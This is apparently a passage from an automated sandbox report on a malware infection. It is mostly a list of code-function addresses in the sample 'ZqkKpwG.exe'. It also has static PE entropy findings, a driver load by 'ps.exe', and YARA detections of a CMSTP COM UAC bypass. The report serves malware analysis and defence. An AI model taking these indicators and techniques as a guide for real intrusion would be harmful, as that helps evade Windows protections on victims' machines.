                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_004034C017_2_004034C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0044CCC017_2_0044CCC0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_004284D017_2_004284D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_004364FA17_2_004364FA
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043B48417_2_0043B484
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00430C9317_2_00430C93
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041CC9C17_2_0041CC9C
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040D4A017_2_0040D4A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_004364A517_2_004364A5
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0044A4A817_2_0044A4A8
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0042CD4117_2_0042CD41
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0044357117_2_00443571
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043650917_2_00436509
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00407D1017_2_00407D10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040DD1817_2_0040DD18
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00423D2017_2_00423D20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043053117_2_00430531
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0044DD3017_2_0044DD30
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040C5D017_2_0040C5D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00410DE217_2_00410DE2
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040CDA017_2_0040CDA0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_004445B017_2_004445B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00439DB717_2_00439DB7
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00403E6017_2_00403E60
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040FE0017_2_0040FE00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043560817_2_00435608
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0042DE2917_2_0042DE29
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041363017_2_00413630
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0042663617_2_00426636
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00408E9017_2_00408E90
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0042469017_2_00424690
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043F69017_2_0043F690
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040474217_2_00404742
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00426F7017_2_00426F70
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00421F7B17_2_00421F7B
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041FFC017_2_0041FFC0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041BFCF17_2_0041BFCF
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0040E7E017_2_0040E7E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00437FEA17_2_00437FEA
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00445FA017_2_00445FA0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD98A017_2_00BD98A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF78A017_2_00BF78A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBC89017_2_00BBC890
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF609017_2_00BF6090
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C090F017_2_00C090F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1B0F017_2_00C1B0F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCA0F017_2_00BCA0F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC50E017_2_00BC50E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD00E017_2_00BD00E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C098B017_2_00C098B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD28C017_2_00BD28C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBE03017_2_00BBE030
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BDE02017_2_00BDE020
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCD81017_2_00BCD810
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEA81017_2_00BEA810
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB100017_2_00BB1000
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1280017_2_00C12800
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEC87017_2_00BEC870
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BED07017_2_00BED070
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0601017_2_00C06010
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCF86017_2_00BCF860
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC384017_2_00BC3840
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C141D017_2_00C141D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC01A017_2_00BC01A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC89A017_2_00BC89A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB899017_2_00BB8990
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCF19017_2_00BCF190
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBD1E017_2_00BBD1E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB41D017_2_00BB41D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEE9C017_2_00BEE9C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE813017_2_00BE8130
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE011017_2_00BE0110
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCE90017_2_00BCE900
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE890017_2_00BE8900
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1D90A17_2_00C1D90A
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE717017_2_00BE7170
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0411017_2_00C04110
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBB96017_2_00BBB960
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0692017_2_00C06920
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC915017_2_00BC9150
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC694017_2_00BC6940
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C222CA17_2_00C222CA
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC82B017_2_00BC82B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC7AA017_2_00BC7AA0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE8AA017_2_00BE8AA0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD3A9017_2_00BD3A90
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD529017_2_00BD5290
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE22F017_2_00BE22F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C112B017_2_00C112B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C17AB017_2_00C17AB0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD320017_2_00BD3200
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C01A0017_2_00C01A00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF8A7017_2_00BF8A70
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1221017_2_00C12210
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C13A2017_2_00C13A20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE3A5017_2_00BE3A50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C2823017_2_00C28230
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB724017_2_00BB7240
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC1BA017_2_00BC1BA0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCE3A017_2_00BCE3A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE53A017_2_00BE53A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C193E017_2_00C193E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC0B9017_2_00BC0B90
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCDB8017_2_00BCDB80
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BDABF017_2_00BDABF0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEABF017_2_00BEABF0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF93D017_2_00BF93D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C07BB017_2_00C07BB0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0035017_2_00C00350
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD732017_2_00BD7320
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF132017_2_00BF1320
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB831017_2_00BB8310
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCB31017_2_00BCB310
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF130F17_2_00BF130F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBA30017_2_00BBA300
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB7B0017_2_00BB7B00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD936017_2_00BD9360
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC7B5017_2_00BC7B50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BFA35017_2_00BFA350
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BFEB4017_2_00BFEB40
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0BCC017_2_00C0BCC0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C084C017_2_00C084C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1A4C017_2_00C1A4C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF4CB017_2_00BF4CB0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB54D017_2_00BB54D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC443017_2_00BC4430
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC043017_2_00BC0430
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC4C1017_2_00BC4C10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCD41017_2_00BCD410
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE341017_2_00BE3410
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD2C0017_2_00BD2C00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C11C0017_2_00C11C00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BCEC7017_2_00BCEC70
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE3C7017_2_00BE3C70
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF646017_2_00BF6460
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC245017_2_00BC2450
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD545017_2_00BD5450
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0343017_2_00C03430
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEC5A017_2_00BEC5A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD2D8017_2_00BD2D80
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEDD8017_2_00BEDD80
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BDB5F017_2_00BDB5F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF7DF017_2_00BF7DF0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C3559217_2_00C35592
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC0DE017_2_00BC0DE0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEDDD917_2_00BEDDD9
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB8DD017_2_00BB8DD0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEF5D017_2_00BEF5D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE7DD017_2_00BE7DD0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD55C017_2_00BD55C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB9D3017_2_00BB9D30
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC653017_2_00BC6530
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD353017_2_00BD3530
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEFD2017_2_00BEFD20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C13D6017_2_00C13D60
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC351017_2_00BC3510
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD9D0017_2_00BD9D00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0FD0017_2_00C0FD00
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0950017_2_00C09500
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEB56017_2_00BEB560
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBCD5017_2_00BBCD50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB16B017_2_00BB16B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD5EB017_2_00BD5EB0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF3EA017_2_00BF3EA0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB969017_2_00BB9690
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBE69017_2_00BBE690
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF2E8017_2_00BF2E80
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBB6F017_2_00BBB6F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD66F017_2_00BD66F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0569017_2_00C05690
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BED6E017_2_00BED6E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BE86E017_2_00BE86E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BFAEE017_2_00BFAEE0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC76C017_2_00BC76C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BEAEC017_2_00BEAEC0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1464017_2_00C14640
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC062017_2_00BC0620
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BDFE2017_2_00BDFE20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C19E6017_2_00C19E60
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBC61017_2_00BBC610
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD0E1017_2_00BD0E10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C17E1017_2_00C17E10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBDE6017_2_00BBDE60
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF965017_2_00BF9650
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C02FC017_2_00C02FC0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF6F9017_2_00BF6F90
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C007F017_2_00C007F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C0FF9017_2_00C0FF90
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BB27E017_2_00BB27E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD6FC017_2_00BD6FC0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC3F2017_2_00BC3F20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBBF1017_2_00BBBF10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD2F1017_2_00BD2F10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BBA70017_2_00BBA700
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C3371817_2_00C33718
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BD1F5017_2_00BD1F50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BC974017_2_00BC9740
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess token adjusted: Load Driver
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: String function: 00C1DE10 appears 97 times
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: String function: 0041A710 appears 104 times
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: String function: 00C2607C appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: String function: 00C2AE24 appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: String function: 0040B110 appears 46 times
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 404
                          Source: EZs3CZC.exe.11.drStatic PE information: Number of sections : 15 > 10
                          Source: EZs3CZC[1].exe.11.drStatic PE information: Number of sections : 15 > 10
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\r4uYZ44_3616
                          Source: 13s1HMkHKv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 28.2.8sb9w_003.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 31.2.svchost.exe.1dbe2750000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 28.2.8sb9w_003.exe.83afc8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 28.2.8sb9w_003.exe.83afc8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 13s1HMkHKv.exeStatic PE information: Section: jfugtalk ZLIB complexity 0.9941429675787107
                          Source: rapes.exe.0.drStatic PE information: Section: jfugtalk ZLIB complexity 0.9941429675787107
                          Source: EZs3CZC[1].exe.11.drStatic PE information: Section: /19 ZLIB complexity 0.9991122159090909
                          Source: EZs3CZC[1].exe.11.drStatic PE information: Section: /32 ZLIB complexity 0.9965919961734694
                          Source: EZs3CZC[1].exe.11.drStatic PE information: Section: /65 ZLIB complexity 0.9991741625310173
                          Source: EZs3CZC[1].exe.11.drStatic PE information: Section: /78 ZLIB complexity 0.9913074675658978
                          Source: EZs3CZC.exe.11.drStatic PE information: Section: /19 ZLIB complexity 0.9991122159090909
                          Source: EZs3CZC.exe.11.drStatic PE information: Section: /32 ZLIB complexity 0.9965919961734694
                          Source: EZs3CZC.exe.11.drStatic PE information: Section: /65 ZLIB complexity 0.9991741625310173
                          Source: EZs3CZC.exe.11.drStatic PE information: Section: /78 ZLIB complexity 0.9913074675658978
                          Source: s7MG2VL[1].exe.11.drStatic PE information: Section: mxyvrfkq ZLIB complexity 0.9946183848634295
                          Source: s7MG2VL.exe.11.drStatic PE information: Section: mxyvrfkq ZLIB complexity 0.9946183848634295
                          Source: ZqkKpwG[1].exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003309917717087
                          Source: ZqkKpwG[1].exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003309917717087
                          Source: ZqkKpwG.exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003309917717087
                          Source: ZqkKpwG.exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003309917717087
                          Source: eAzoDbY[1].exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                          Source: eAzoDbY[1].exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                          Source: eAzoDbY.exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                          Source: eAzoDbY.exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                          Source: 8sb9w_003[1].exe.11.drStatic PE information: Section: ss2 ZLIB complexity 0.9900907166901125
